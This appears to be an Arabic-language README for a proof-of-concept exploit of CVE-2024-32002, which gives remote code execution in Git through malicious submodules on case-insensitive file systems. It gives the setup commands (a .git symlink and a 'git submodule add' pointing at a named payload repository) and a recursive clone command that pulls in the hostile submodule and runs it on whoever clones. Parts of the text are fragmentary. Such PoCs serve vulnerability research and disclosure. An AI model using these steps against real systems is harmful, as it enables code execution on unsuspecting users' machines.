
إثبات المفهوم لاستغلال CVE-2024-32002، يوضح تنفيذ الأكواد عن بُعد عبر وحدات Git الفرعية الخبيثة على أنظمة الملفات غير الحساسة لحالة الأحرف.
POC لـ CVE-2024-32002 يوضح تنفيذ الأوامر عن بعد (RCE).
انظر cve-2024-32002-poc-rce لمستودع الوحدة الفرعية المرتبطة.
.git..gitmodules يعرّف الوحدة الفرعية الضارة.تم إنشاء هذا المستودع في لينكس (WSL2 تحديدًا). هذا مهم، لا يمكن إنشاء المستودع الضار إلا على نظام ملفات حساس لحالة الأحرف.
ln -s .git submodule
ملاحظات:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
ملاحظات:
.git الذي يتتبع حالة git للوحدات الفرعية.تؤثر هذه الثغرة فقط على ويندوز وماك أو إس لأنهما يمتلكان أنظمة ملفات غير حساسة لحالة الأحرف.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git